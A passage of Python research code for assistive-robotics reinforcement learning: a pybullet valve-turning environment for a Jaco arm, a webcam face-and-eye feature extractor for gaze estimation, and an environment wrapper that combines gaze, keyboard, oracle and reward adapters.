direction = np.zeros(3)
if self.task_success:
index = 0
self.n_success += 1
tracking_angle = self.valve_angle
else:
tracking_angle = self.valve_angle
if self.angle_diff(self.valve_angle, self.target_angle) > 0:
index = 1
tracking_angle = self.wrap_angle(tracking_angle - 2 * self.min_error_threshold)
else:
index = 2
tracking_angle = self.wrap_angle(tracking_angle + 2 * self.min_error_threshold)
self.n_success = 0
tracking_input = self.target_norm * np.array((-np.cos(tracking_angle), np.sin(tracking_angle))) + \
np.delete(self.valve_pos, 1)
direction[index] = 1
if self.n_success >= self.term_thresh:
color = [0, 1, 0, 1]
elif self.task_success:
color = [0, 0, 1, 1]
else:
color = [1, 0, 0, 1]
p.changeVisualShape(self.target_indicator, -1, rgbaColor=color)
info = {
'task_success': self.task_success,
'old_tool_pos': old_tool_pos,
'tool_pos': self.tool_pos,
'valve_pos': self.valve_pos,
'valve_angle': self.valve_angle,
'target_angle': self.target_angle,
'error_threshold': self.error_threshold,
'direction': direction,
'angle_error': self.angle_diff(self.valve_angle, self.target_angle),
'target_position': self.target_position,
'tracking_input': tracking_input
}
done = False
if self.term_cond == 'auto':
done = self.n_success >= self.term_thresh
elif self.term_cond == 'keyboard':
keys = p.getKeyboardEvents()
if self.n_success >= self.term_thresh and p.B3G_RETURN in keys and keys[p.B3G_RETURN] & p.KEY_WAS_TRIGGERED:
done = True
time.sleep(1)
info['feedback'] = True if done else -1
return obs, reward, done, info
def _get_obs(self, forces):
robot_joint_states = p.getJointStates(self.robot, jointIndices=self.robot_left_arm_joint_indices,
physicsClientId=self.id)
robot_joint_positions = np.array([x[0] for x in robot_joint_states])
robot_joint_velocities = np.array([x[1] for x in robot_joint_states])
angle_features = [np.sin(self.valve_angle), np.cos(self.valve_angle)]
obs = [self.tool_pos, self.tool_orient, self.tool_velocity,
angle_features, [self.valve_velocity],
robot_joint_positions, robot_joint_velocities
]
encoder_obs = [self.tool_pos, angle_features]
if self.stochastic:
obs.append(self.valve_pos)
encoder_obs.append(self.valve_pos)
robot_obs = dict(
raw_obs=np.concatenate(obs),
encoder_obs=np.concatenate(encoder_obs),
hindsight_goal=np.array([np.sin(self.valve_angle), np.cos(self.valve_angle)]),
goal=self.goal.copy(),
)
self.last_angle = self.valve_angle
return robot_obs
def update_curriculum(self, success):
if success:
self.error_threshold -= self.min_error_threshold
self.error_threshold = max(self.min_error_threshold, self.error_threshold)
else:
self.error_threshold += self.min_error_threshold
self.error_threshold = min(self.max_error_threshold, self.error_threshold)
def reset(self):
"""set up standard environment"""
self.setup_timing()
_human, self.wheelchair, self.robot, self.robot_lower_limits, self.robot_upper_limits, _human_lower_limits, \
_human_upper_limits, self.robot_right_arm_joint_indices, self.robot_left_arm_joint_indices, self.gender \
= self.world_creation.create_new_world(furniture_type='wheelchair', init_human=False,
static_human_base=True, human_impairment='random',
print_joints=False, gender='random')
self.robot_lower_limits = self.robot_lower_limits[self.robot_left_arm_joint_indices]
self.robot_upper_limits = self.robot_upper_limits[self.robot_left_arm_joint_indices]
self.reset_robot_joints()
wheelchair_pos, wheelchair_orient = p.getBasePositionAndOrientation(self.wheelchair, physicsClientId=self.id)
p.resetBasePositionAndOrientation(self.robot, np.array(wheelchair_pos) + np.array([-0.35, -0.3, 0.3]),
p.getQuaternionFromEuler([0, 0, -np.pi / 2.0], physicsClientId=self.id),
physicsClientId=self.id)
base_pos, base_orient = p.getBasePositionAndOrientation(self.robot, physicsClientId=self.id)
self.human_controllable_joint_indices = []
self.human_lower_limits = np.array([])
self.human_upper_limits = np.array([])
"""set up target and initial robot position"""
if not self.session_goal:
self.set_target_index() # instance override in demos
self.reset_noise()
self.init_robot_arm()
wall_collision = p.createCollisionShape(p.GEOM_BOX, halfExtents=[4, .1, 1])
wall_visual = p.createVisualShape(p.GEOM_BOX, halfExtents=[4, .1, 1], rgbaColor=self.wall_color)
wall_pos, wall_orient = np.array([0., -1.1, 1.]), np.array([0, 0, 0, 1])
if self.stochastic and not self.calibrate:
wall_pos = wall_pos + self.wall_noise
self.wall = p.createMultiBody(basePosition=wall_pos, baseOrientation=wall_orient,
baseCollisionShapeIndex=wall_collision, baseVisualShapeIndex=wall_visual,
physicsClientId=self.id)
valve_pos, valve_orient = p.multiplyTransforms(wall_pos, wall_orient, [0, 0.1, 0],
p.getQuaternionFromEuler([0, 0, 0]),
physicsClientId=self.id)
if self.stochastic:
valve_pos = np.array(valve_pos) + self.valve_pos_noise
self.valve = p.loadURDF(os.path.join(self.world_creation.directory, 'valve', 'valve.urdf'),
basePosition=valve_pos, useFixedBase=True,
baseOrientation=valve_orient, globalScaling=1,
physicsClientId=self.id)
if self.preserve_angle and self.last_angle is not None:
p.resetJointState(self.valve, 0, self.last_angle, physicsClientId=self.id)
elif self.use_rand_init_angle:
p.resetJointState(self.valve, 0, self.rand_init_angle, physicsClientId=self.id)
"""configure pybullet"""
p.setGravity(0, 0, 0, physicsClientId=self.id)
p.setPhysicsEngineParameter(numSubSteps=5, numSolverIterations=10, physicsClientId=self.id)
# Enable rendering
p.resetDebugVisualizerCamera(cameraDistance=.1, cameraYaw=180, cameraPitch=-10,
cameraTargetPosition=[0, -.3, 1.1], physicsClientId=self.id)
p.configureDebugVisualizer(p.COV_ENABLE_RENDERING, 1, physicsClientId=self.id)
self.goal = np.array([np.sin(self.target_angle), np.cos(self.target_angle)])
sphere_visual = p.createVisualShape(shapeType=p.GEOM_SPHERE, radius=0.1,
rgbaColor=[1, 0, 0, 1], physicsClientId=self.id)
target_coord = self.target_norm * np.array((-np.cos(self.target_angle), 0, np.sin(self.target_angle))) + \
valve_pos + [0, 0.105, 0]
self.target_indicator = p.createMultiBody(baseMass=0.0, baseCollisionShapeIndex=-1,
baseVisualShapeIndex=sphere_visual, basePosition=target_coord,
useMaximalCoordinates=False, physicsClientId=self.id)
self.n_success = 0
obs = self._get_obs([0])
return obs
def init_start_pos(self):
"""exchange this function for curriculum"""
self.init_pos = np.array([0, -.5, 1.1])
self.init_pos += self.init_pos_random.uniform([-0.1, -0.1, -0.1], [0.1, 0.1, 0.1], size=3)
def init_robot_arm(self):
self.init_start_pos()
init_orient = p.getQuaternionFromEuler(np.array([0, np.pi / 2.0, 0]), physicsClientId=self.id)
self.util.ik_random_restarts(self.robot, 11, self.init_pos, init_orient, self.world_creation,
self.robot_left_arm_joint_indices, self.robot_lower_limits,
self.robot_upper_limits,
ik_indices=[0, 1, 2, 3, 4, 5, 6], max_iterations=100,
max_ik_random_restarts=10, random_restart_threshold=0.03, step_sim=True)
self.world_creation.set_gripper_open_position(self.robot, position=1, left=True, set_instantly=True)
self.tool = self.world_creation.init_tool(self.robot, mesh_scale=[0.001] * 3, pos_offset=[0, 0, 0.02],
orient_offset=p.getQuaternionFromEuler([0, -np.pi / 2.0, 0],
physicsClientId=self.id),
maximal=False)
def set_target_index(self, index=None):
if self.num_targets is not None:
if index is None:
self.target_index = self.np_random.choice(self.target_indices)
else:
self.target_index = index
def reset_noise(self):
self.rand_init_angle = (self.np_random.rand() - 0.5) * 2 * np.pi
# init angle either self.rand_init_angle or 0
if self.preserve_angle and self.last_angle is not None:
avoid = self.last_angle
elif self.use_rand_init_angle:
avoid = self.rand_init_angle
else:
avoid = 0
self.rand_angle = None
while self.rand_angle is None or np.abs(self.angle_diff(self.rand_angle, avoid)) < self.error_threshold:
self.rand_angle = (self.np_random.rand() - 0.5) * 2 * np.pi
if self.stochastic:
self.valve_pos_noise = np.array([self.np_random.uniform(-.05, .05), 0, 0])
# no y noise so can use 2D coordinates only for goal estimation
self.wall_noise = np.zeros(3)
def wrong_goal_reached(self):
return False
def calibrate_mode(self, calibrate, split):
self.wall_color = [255 / 255, 187 / 255, 120 / 255, 1] if calibrate else None
self.calibrate = calibrate
@property
def tool_pos(self):
return np.array(p.getBasePositionAndOrientation(self.tool, physicsClientId=self.id)[0])
@property
def tool_orient(self):
return np.array(p.getBasePositionAndOrientation(self.tool, physicsClientId=self.id)[1])
@property
def tool_velocity(self):
return np.array(p.getBaseVelocity(self.tool, physicsClientId=self.id)[0])
@property
def valve_pos(self):
return p.getLinkState(self.valve, 0, computeForwardKinematics=True, physicsClientId=self.id)[0]
@property
def valve_angle(self):
return self.wrap_angle(p.getJointStates(self.valve, jointIndices=[0], physicsClientId=self.id)[0][0])
@property
def valve_velocity(self):
return p.getJointStates(self.valve, jointIndices=[0], physicsClientId=self.id)[0][1]
@property
def target_angle(self):
return self.rand_angle if self.num_targets is None or not self.calibrate else \
self.wrap_angle(self.target_angles[self.target_index])
@property
def target_position(self):
return np.delete(np.array(p.getBasePositionAndOrientation(self.target_indicator, physicsClientId=self.id)[0]), 1)
def wrap_angle(self, angle):
return angle - 2 * np.pi * np.floor((angle + np.pi) / (2 * np.pi))
def angle_diff(self, angle1, angle2):
a = angle1 - angle2
if a > np.pi:
a -= 2 * np.pi
elif a < -np.pi:
a += 2 * np.pi
return a
@property
def task_success(self):
return np.abs(self.angle_diff(self.valve_angle, self.target_angle)) < self.error_threshold
class ValveJacoEnv(ValveEnv):
def __init__(self, **kwargs):
super().__init__(robot_type='jaco', **kwargs)
```
#### File: image/gaze_capture/face_processor.py
```python
import dlib
import cv2
import math
import numpy as np
from .ITrackerData import loadMetadata
import os
from pathlib import Path
main_dir = str(Path(__file__).resolve().parents[1])
class FaceProcessor:
def __init__(self, predictor_path):
self.face_detector = dlib.get_frontal_face_detector()
self.predictor = dlib.shape_predictor(predictor_path)
self.img_dim = 224
self.face_grid_dim = 25
self.left_eye_points = [42, 43, 44, 45, 46, 47]
self.right_eye_points = [36, 37, 38, 39, 40, 41]
self.face_mean = loadMetadata(os.path.join(main_dir,'gaze_capture','model_files','mean_face_224.mat'),
silent=True)['image_mean']
self.left_eye_mean = loadMetadata(os.path.join(main_dir,'gaze_capture','model_files','mean_left_224.mat'),
silent=True)['image_mean']
self.right_eye_mean = loadMetadata(os.path.join(main_dir,'gaze_capture','model_files','mean_right_224.mat'),
silent=True)['image_mean']
def get_gaze_features(self, frame):
height, width = frame.shape[:2]
diff = height - width
# crop image to square
if diff > 0:
frame = frame[math.floor(diff / 2): -math.ceil(diff / 2)]
elif diff < 0:
frame = frame[:, -math.floor(diff / 2): math.ceil(diff / 2)]
gs_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
face_box = self._get_facial_detections(gs_frame)
if face_box is None:
return None
face = self._get_face(frame, face_box)
if face is None:
return None
face = (face - self.face_mean) / 255
face_grid = self._get_face_grid(frame, face_box)
landmarks = self.predictor(gs_frame, face_box)
og_left_eye = self._get_eye(frame, landmarks, self.left_eye_points)
og_right_eye = self._get_eye(frame, landmarks, self.right_eye_points)
left_eye = (og_left_eye - self.left_eye_mean) / 255
right_eye = (og_right_eye - self.right_eye_mean) / 255
face = np.moveaxis(face, -1, 0)
left_eye = np.moveaxis(left_eye, -1, 0)
right_eye = np.moveaxis(right_eye, -1, 0)
return face, left_eye, right_eye, face_grid, # og_left_eye, og_right_eye
def _get_face(self, frame, face_box):
try:
face = frame[face_box.top(): face_box.bottom(), face_box.left(): face_box.right()]
face = cv2.resize(face, (self.img_dim, self.img_dim))
face = np.flip(face, axis=2)
except:
return None
return face
def _get_face_grid(self, frame, face_box):
frame_dim = len(frame)
top = math.floor(face_box.top() * self.face_grid_dim / frame_dim)
bottom = math.ceil(face_box.bottom() * self.face_grid_dim / frame_dim)
left = math.floor(face_box.left() * self.face_grid_dim / frame_dim)
right = math.ceil(face_box.right() * self.face_grid_dim / frame_dim)
face_grid = np.zeros((self.face_grid_dim, self.face_grid_dim))
face_grid[top: bottom, left: right] = 1
return face_grid
def _get_eye(self, frame, landmarks, points):
eye_landmarks = self._get_landmarks(landmarks, points)
left, top, width, height = cv2.boundingRect(eye_landmarks)
w_margin = int(width / 3)
h_margin = (width + 2 * w_margin - height) / 2
top_margin = math.ceil(h_margin)
bot_margin = math.floor(h_margin)
eye = frame[top - top_margin: top + height + bot_margin, left - w_margin: left + width + w_margin]
eye = cv2.resize(eye, (self.img_dim, self.img_dim))
eye = np.flip(eye, axis=2)
return eye
def get_eye_aspect_ratio(self, frame):
gs_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
face_box = self._get_facial_detections(gs_frame)
if face_box is None:
return None
landmarks = self.predictor(gs_frame, face_box)
left_eye_landmarks = self._get_landmarks(landmarks, self.left_eye_points)
right_eye_landmarks = self._get_landmarks(landmarks, self.right_eye_points)
left_eye_aspect_ratio = self._eye_aspect_ratio(left_eye_landmarks)
right_eye_aspect_ratio = self._eye_aspect_ratio(right_eye_landmarks)
return (left_eye_aspect_ratio + right_eye_aspect_ratio) / 2
def _get_facial_detections(self, gs_frame):
detections = self.face_detector(gs_frame)
if len(detections) == 0:
return None
return detections[0]
@staticmethod
def _get_landmarks(landmarks, points):
return np.array([(landmarks.part(point).x, landmarks.part(point).y) for point in points])
@staticmethod
def _eye_aspect_ratio(eye_landmarks):
v_1 = np.linalg.norm(eye_landmarks[1] - eye_landmarks[5])
v_2 = np.linalg.norm(eye_landmarks[2] - eye_landmarks[4])
h = np.linalg.norm(eye_landmarks[0] - eye_landmarks[3])
return (v_1 + v_2) / (2 * h)
```
#### File: rl/misc/env_wrapper.py
```python
from functools import reduce
import os
from pathlib import Path
import h5py
from collections import deque
import numpy as np
from numpy.random import default_rng
from numpy.linalg import norm
import pybullet as p
import assistive_gym as ag
from gym import spaces, Env
import cv2
import torch
from gaze_capture.face_processor import FaceProcessor
from gaze_capture.ITrackerModel import ITrackerModel
import threading
from rl.oracles import *
main_dir = str(Path(__file__).resolve().parents[2])
def default_overhead(config):
factory_map = {
'session': session_factory,
}
factories = [factory_map[factory] for factory in config['factories']]
factories = [action_factory] + factories
wrapper = reduce(lambda value, func: func(value), factories, LibraryWrapper)
class Overhead(wrapper):
def __init__(self, config):
super().__init__(config)
self.rng = default_rng(config['seedid'])
adapt_map = {
'oracle': oracle,
'static_gaze': static_gaze,
'real_gaze': real_gaze,
'joint': joint,
'sim_keyboard': sim_keyboard,
'keyboard': keyboard,
'goal': goal,
'reward': reward,
'sim_target': sim_target,
'dict_to_array': dict_to_array,
}
self.adapts = [adapt_map[adapt] for adapt in config['adapts']]
self.adapts = [adapt(self, config) for adapt in self.adapts]
self.adapt_step = lambda obs, r, done, info: reduce(lambda sub_tran, adapt: adapt._step(*sub_tran),
self.adapts, (obs, r, done, info))
self.adapt_reset = lambda obs, info=None: reduce(lambda obs, adapt: adapt._reset(obs, info), self.adapts,
(obs))
def step(self, action):
tran = super().step(action)
tran = self.adapt_step(*tran)
return tran
def reset(self):
obs = super().reset()
obs = self.adapt_reset(obs)
return obs
return Overhead(config)
class LibraryWrapper(Env):
def __init__(self, config):
self.env_name = config['env_name']
self.base_env = {
"OneSwitch": ag.OneSwitchJacoEnv,
"Bottle": ag.BottleJacoEnv,
"Valve": ag.ValveJacoEnv,
"BlockPush": ag.BlockPushJacoEnv,
}[config['env_name']]
self.base_env = self.base_env(**config['env_kwargs'])
self.observation_space = self.base_env.observation_space
self.encoder_observation_space = None
if hasattr(self.base_env, 'encoder_observation_space'):
self.encoder_observation_space = self.base_env.encoder_observation_space
self.action_space = self.base_env.action_space
self.feature_sizes = self.base_env.feature_sizes
self.terminate_on_failure = config['terminate_on_failure']
def step(self, action):
obs, r, done, info = self.base_env.step(action)
if self.terminate_on_failure and hasattr(self.base_env, 'wrong_goal_reached'):
done = done or self.base_env.wrong_goal_reached()
return obs, r, done, info
def reset(self):
return self.base_env.reset()
def render(self, mode=None, **kwargs):
return self.base_env.render(mode)
def seed(self, value):
self.base_env.seed(value)
def close(self):
self.base_env.close()
def get_base_env(self):
return self.base_env
def action_factory(base):
class Action(base):
def __init__(self, config):
super().__init__(config)
self.action_type = config['action_type']
self.action_space = {
"trajectory": spaces.Box(-.1, .1, (3,)),
"joint": spaces.Box(-.25, .25, (7,)),
"disc_traj": spaces.Box(0, 1, (6,)),
}[config['action_type']]
self.translate = {
'trajectory': self.trajectory,
'joint': self.joint,
'disc_traj': self.disc_traj,
}[config['action_type']]
self.smooth_alpha = config['smooth_alpha']
def joint(self, action, info={}):
clip_by_norm = lambda traj, limit: traj / max(1e-4, norm(traj)) * np.clip(norm(traj), None, limit)
action = clip_by_norm(action, .25)
info['joint'] = action
return action, info
def target(self, coor, info={}):
base_env = self.base_env
info['target'] = coor
joint_states = p.getJointStates(base_env.robot, jointIndices=base_env.robot_left_arm_joint_indices,
physicsClientId=base_env.id)
joint_positions = np.array([x[0] for x in joint_states])
link_pos = p.getLinkState(base_env.robot, 13, computeForwardKinematics=True, physicsClientId=base_env.id)[0]
new_pos = np.array(coor) + np.array(link_pos) - base_env.tool_pos
new_joint_positions = np.array(
p.calculateInverseKinematics(base_env.robot, 13, new_pos, physicsClientId=base_env.id))
new_joint_positions = new_joint_positions[:7]
action = new_joint_positions - joint_positions
return self.joint(action, info)
def trajectory(self, traj, info={}):
clip_by_norm = lambda traj, min_l=None, max_l=None: traj / max(1e-4, norm(traj)) * np.clip(norm(traj),
min_l, max_l)
traj = clip_by_norm(traj, .07, .1)
info['trajectory'] = traj
return self.target(self.base_env.tool_pos + traj, info)
def disc_traj(self, onehot, info={}):
info['disc_traj'] = onehot
index = np.argmax(onehot)
traj = [
np.array((-1, 0, 0)),
np.array((1, 0, 0)),
np.array((0, -1, 0)),
np.array((0, 1, 0)),
np.array((0, 0, -1)),
np.array((0, 0, 1)),
][index]
return self.trajectory(traj, info)
def step(self, action):
action, ainfo = self.translate(action)
obs, r, done, info = super().step(action)
info = {**info, **ainfo}
return obs, r, done, info
def reset(self):
self.action = np.zeros(7)
return super().reset()
return Action
def session_factory(base):
class Session(base):
def __init__(self, config):
config['env_kwargs']['session_goal'] = True
super().__init__(config)
self.goal_reached = False
def new_goal(self, index=None):
self.base_env.set_target_index(index)
self.base_env.reset_noise()
self.goal_reached = False
def step(self, action):
o, r, d, info = super().step(action)
if info['task_success']:
self.goal_reached = True
return o, r, d, info
def reset(self):
return super().reset()
return Session
class array_to_dict:
def __init__(self, master_env, config):
pass
def _step(self, obs, r, done, info):
if not isinstance(obs, dict):
obs = {'raw_obs': obs}
return obs, r, done, info
def _reset(self, obs, info=None):
if not isinstance(obs, dict):
obs = {'raw_obs': obs}
return obs
class goal:
"""
Chooses what features from info to add to obs
"""
def __init__(self, master_env, config):
self.env_name = master_env.env_name
self.master_env = master_env
self.goal_feat_func = dict(
Kitchen=lambda info: [info['target1_pos'], info['orders'], info['tasks']],
Bottle=None,
OneSwitch=None,
Valve=None,
BlockPush=lambda info: [info['ground_truth']]
)[self.env_name]
self.hindsight_feat = dict(
Kitchen={'tool_pos': 3, 'orders': 2, 'tasks': 6},
Bottle={'tool_pos': 3},
OneSwitch={'tool_pos': 3},
Valve={'valve_angle': 2},
BlockPush={'ground_truth': 3}
)[self.env_name]
master_env.goal_size = self.goal_size = sum(self.hindsight_feat.values())
def _step(self, obs, r, done, info):
if self.goal_feat_func is not None:
obs['goal'] = np.concatenate([np.ravel(state_component) for state_component in self.goal_feat_func(info)])
hindsight_feat = np.concatenate(
[np.ravel(info[state_component]) for state_component in self.hindsight_feat.keys()])
obs['hindsight_goal'] = hindsight_feat
return obs, r, done, info
def _reset(self, obs, info=None):
if self.goal_feat_func is not None:
obs['goal'] = np.zeros(self.goal_size)
obs['hindsight_goal'] = np.zeros(self.goal_size)
return obs
class static_gaze:
def __init__(self, master_env, config):
self.gaze_dim = config['gaze_dim']
del master_env.feature_sizes['goal']
master_env.feature_sizes['gaze_features'] = self.gaze_dim
self.env_name = master_env.env_name
self.master_env = master_env
with h5py.File(os.path.join(str(Path(__file__).resolve().parents[2]), 'gaze_capture', 'gaze_data',
config['gaze_path']), 'r') as gaze_data:
self.gaze_dataset = {k: v[()] for k, v in gaze_data.items()}
self.per_step = True
def sample_gaze(self, index):
unique_target_index = index
data = self.gaze_dataset[str(unique_target_index)]
return self.master_env.rng.choice(data)
def _step(self, obs, r, done, info):
if self.per_step:
if self.env_name == 'OneSwitch':
self.static_gaze = self.sample_gaze(self.master_env.base_env.target_indices.index(info['unique_index']))
elif self.env_name == 'Bottle':
self.static_gaze = self.sample_gaze(info['unique_index'])
obs['gaze_features'] = self.static_gaze
return obs, r, done, info
def _reset(self, obs, info=None):
if self.env_name == 'OneSwitch':
index = self.master_env.base_env.target_indices.index(self.master_env.base_env.unique_index)
elif self.env_name == 'Bottle':
index = self.master_env.base_env.unique_index
obs['gaze_features'] = self.static_gaze = self.sample_gaze(index)
return obs
class real_gaze:
def __init__(self, master_env, config):
self.gaze_dim = config['gaze_dim']
del master_env.feature_sizes['goal']
master_env.feature_sizes['gaze_features'] = self.gaze_dim
self.env_name = master_env.env_name
self.master_env = master_env
self.webcam = cv2.VideoCapture(0)
self.face_processor = FaceProcessor(
os.path.join(main_dir, 'gaze_capture', 'model_files', 'shape_predictor_68_face_landmarks.dat'))
self.i_tracker = ITrackerModel()
if torch.cuda.is_available():
self.device = torch.device("cuda:0")
self.i_tracker.cuda()
state = torch.load(os.path.join(main_dir, 'gaze_capture', 'checkpoint.pth.tar'))['state_dict']
else:
self.device = "cpu"
state = torch.load(os.path.join(main_dir, 'gaze_capture', 'checkpoint.pth.tar'),
map_location=torch.device(ptu.device))['state_dict']
self.i_tracker.load_state_dict(state, strict=False)
self.gaze = np.zeros(self.gaze_dim)
self.gaze_lock = threading.Lock()
self.gaze_thread = None
def record_gaze(self):
_, frame = self.webcam.read()
features = self.face_processor.get_gaze_features(frame)
if features is None:
print("GAZE NOT CAPTURED")
gaze = np.zeros(self.gaze_dim)
else:
i_tracker_input = [torch.from_numpy(feature)[None].float().to(self.device) for feature in features]
i_tracker_features = self.i_tracker(*i_tracker_input).detach().cpu().numpy()
gaze = i_tracker_features[0]
self.gaze_lock.acquire()
self.gaze = gaze
self.gaze_lock.release()
def restart_gaze_thread(self):
if self.gaze_thread is None or not self.gaze_thread.is_alive():
self.gaze_thread = threading.Thread(target=self.record_gaze, name='gaze_thread')
self.gaze_thread.start()
def update_obs(self, obs):
self.gaze_lock.acquire()
obs['gaze_features'] = self.gaze
self.gaze_lock.release()
def _step(self, obs, r, done, info):
self.restart_gaze_thread()
self.update_obs(obs)
return obs, r, done, info
def _reset(self, obs, info=None):
self.restart_gaze_thread()
self.update_obs(obs)
return obs
class sim_target:
def __init__(self, master_env, config):
self.env_name = master_env.env_name
self.master_env = master_env
self.feature = config.get('feature')
del master_env.feature_sizes['goal']
self.target_size = master_env.feature_sizes['target'] = 2 if self.env_name == 'Valve' else 3
# should change to automate for all features eventually
if self.feature == 'direction':
self.target_size = master_env.feature_sizes['target'] = 3
elif self.feature == 'target_position':
self.target_size = master_env.feature_sizes['target'] = 2
self.goal_noise_std = config['goal_noise_std']
def _step(self, obs, r, done, info):
self.add_target(obs, info)
return obs, r, done, info
def _reset(self, obs, info=None):
self.add_target(obs, info)
return obs
def add_target(self, obs, info):
if self.feature is None or self.feature is 'goal':
target = obs['goal']
elif info is None:
target = np.zeros(self.target_size)
else:
target = info[self.feature]
noise = np.random.normal(scale=self.goal_noise_std, size=target.shape) if self.goal_noise_std else 0
obs['target'] = target + noise
from rl.policies.keyboard_policy import KeyboardPolicy
class keyboard:
def __init__(self, master_env, config):
self.env_name = master_env.env_name
self.master_env = master_env
self.feature = config.get('feature')
del master_env.feature_sizes['goal']
self.size = master_env.feature_sizes['target'] = config.get('keyboard_size', 6)
self.mode = config.get('mode')
self.noise_p = config.get('keyboard_p')
self.blank_p = config.get('blank_p')
self.smoothing = config.get('smoothing')
self.lag = config.get('lag')
self.policy = KeyboardPolicy(master_env, demo=False)
def _step(self, obs, r, done, info):
self.add_target(obs, info)
return obs, r, done, info
def _reset(self, obs, info=None):
self.policy.reset()
self.action = np.zeros(self.size)
self.lag_queue = deque(np.zeros((self.lag, self.size))) if self.lag else deque()
self.add_target(obs, info)
return obs
def add_target(self, obs, info):
action, _ = self.policy.get_action(obs)
obs['user_input'] = action
self.action = self.smoothing * self.action + action
action = (1-self.smoothing)*self.action
self.lag_queue.append(action)
lag_action = self.lag_queue.popleft()
action = lag_action
obs['target'] = action
from rl.policies.encdec_policy import EncDecPolicy
import rlkit.torch.pytorch_util as ptu
import torch as th
class sim_keyboard:
def __init__(self, master_env, config):
self.env_name = master_env.env_name
self.master_env = master_env
self.feature = config.get('feature')
del master_env.feature_sizes['goal']
self.size = master_env.feature_sizes['target'] = config.get('keyboard_size', 6)
self.mode = config.get('mode')
self.noise_p = config.get('keyboard_p')
self.blank_p = config.get('blank_p')
file_name = os.path.join('image','util_models', f'{self.env_name}_params_s1_sac.pkl')
loaded = th.load(file_name, map_location=ptu.device)
policy = loaded['trainer/policy']
prev_vae = loaded['trainer/vae'].to(ptu.device)
self.policy = EncDecPolicy(
policy=policy,
features_keys=['goal'],
vaes=[prev_vae],
deterministic=True,
latent_size=4,
incl_state=False,
)
def _step(self, obs, r, done, info):
self.add_target(obs, info)
return obs, r, done, info
def _reset(self, obs, info=None):
self.policy.reset()
self.add_target(obs, info)
return obs
def add_target(self, obs, info):
dist = norm(obs[self.feature] - obs['block_pos'])
old_dist = norm(obs[self.feature] - obs['old_block_pos'])
if self.mode == 'tool':
traj = obs[self.feature] - obs['tool_pos']
axis = np.argmax(np.abs(traj))
index = 2 * axis + (traj[axis] > 0)
elif self.mode == 'block':
traj = obs[self.feature] - obs['block_pos']
axis = np.argmax(np.abs(traj))
index = 2 * axis + (traj[axis] > 0)
elif self.mode == 'sip-puff':
index = dist < old_dist
elif self.mode == 'xy':
traj = obs[self.feature][:2] - obs['block_pos'][:2]
axis = np.argmax(np.abs(traj))
index = 2 * axis + (traj[axis] > 0)
elif self.mode == 'oracle':
oracle_action, _ = self.policy.get_action(obs)
axis = np.argmax(np.abs(oracle_action))
index = 2 * axis + (oracle_action[axis] > 0)
if np.random.uniform() < self.noise_p:
index = np.random.randint(self.size)
action = np.zeros(self.size)
action[index] = 1
if np.random.uniform() < self.blank_p:
action = np.zeros(self.size)
if self.mode == 'sip-puff':
action[-3:] = obs['old_block_pos']
obs['target'] = action
from rl.policies.block_push_oracle import BlockPushOracle
class oracle:
def __init__(self, master_env, config):
self.env_name = master_env.env_name
self.master_env = master_env
self.feature = config.get('feature')
del master_env.feature_sizes['goal']
self.size = master_env.feature_sizes['target'] = config.get('keyboard_size', 7)
self.blank_p = config.get('blank_p',0)
self.spread = config.get('oracle_noise',0)
self.smoothing = config.get('smoothing',0)
self.lag = 0
file_name = os.path.join('image','util_models', f'{self.env_name}_params_s1_sac.pkl')
loaded = th.load(file_name, map_location=ptu.device)
policy = loaded['trainer/policy']
prev_vae = loaded['trainer/vae'].to(ptu.device)
self.policy = EncDecPolicy(
policy=policy,
features_keys=['goal'],
vaes=[prev_vae],
deterministic=True,
latent_size=4,
incl_state=False,
)
self.use_tool_action = config.get('use_tool_action',False)
def _step(self, obs, r, done, info):
self.add_target(obs, info)
return obs, r, done, info
def _reset(self, obs, info=None):
self.policy.reset()
self.action = np.zeros(self.size)
self.lag_queue = deque(np.zeros((self.lag, self.size))) if self.lag else deque()
self.add_target(obs, info)
return obs
def add_target(self, obs, info):
action, _ = self.policy.get_action(obs)
action += np.random.normal(np.zeros(action.shape), self.spread)
if np.random.uniform() < self.blank_p:
action = np.zeros(action.shape)
self.action = self.smoothing * self.action + action
action = (1-self.smoothing)*self.action
self.lag_queue.append(action)
lag_action = self.lag_queue.popleft()
action = lag_action
obs['target'] = action
class joint:
def __init__(self, master_env, config):
master_env.observation_space = spaces.Box(-np.inf, np.inf, (master_env.observation_space.low.size + 7,))
def _step(self, obs, r, done, info):
obs['raw_obs'] = np.concatenate((obs['raw_obs'], obs['joint']))
return obs, r, done, info
def _reset(self, obs, info=None):
obs['raw_obs'] = np.concatenate((obs['raw_obs'], obs['joint']))
return obs
class dict_to_array:
def __init__(self, master_env, config):
pass
def _step(self, obs, r, done, info):
obs = np.concatenate((obs['raw_obs'], obs['target']))
return obs, r, done, info
def _reset(self, obs, info=None):
obs = np.concatenate((obs['raw_obs'], obs['target']))
return obs
class reward:
""" rewards capped at 'cap' """
def __init__(self, master_env, config):
self.range = (config['reward_min'], config['reward_max'])
self.master_env = master_env
self.reward_type = config.get('reward_type')
self.reward_temp = config.get('reward_temp')
self.reward_offset = config.get('reward_offset')
def _step(self, obs, r, done, info):
if self.reward_type == 'custom':
r = -1
r += np.exp(-norm(info['tool_pos'] - info['target1_pos'])) / 2
if info['target1_reached']:
r = -.5
r += np.exp(-norm(info['tool_pos'] - info['target_pos'])) / 2
if info['task_success']:
r = 0
elif self.reward_type == 'custom_kitchen':
r = -1
if not info['tasks'][0] and (info['orders'][0] == 0 or info['tasks'][1]):
r += np.exp(-10 * max(0, info['microwave_angle'] - -.7)) / 6 * 3 / 4 * 1 / 2
r += np.exp(-self.reward_temp * norm(info['tool_pos'] - info['microwave_handle'])) / 6 / 4 * 1 / 2
elif info['tasks'][0]:
r += 1 / 6
if not info['tasks'][1] and (info['orders'][0] == 1 or info['tasks'][0]):
r += np.exp(-10 * max(0, .7 - info['fridge_angle'])) / 6 * 3 / 4 * 1 / 2
r += np.exp(-self.reward_temp * norm(info['tool_pos'] - info['fridge_handle'])) / 6 / 4 * 1 / 2
elif info['tasks'][1]:
r += 1 / 6
if not info['tasks'][2] and info['tasks'][0] and info['tasks'][1]:
r += np.exp(-self.reward_temp * norm(info['tool_pos'] - info['target1_pos'])) / 6 * 1 / 2
elif info['tasks'][2]:
r = -1 / 2
if not info['tasks'][3] and info['tasks'][2]:
r += np.exp(-self.reward_temp * norm(info['tool_pos'] - info['target_pos'])) / 6 * 1 / 2
elif info['tasks'][3]:
r = -1 / 3
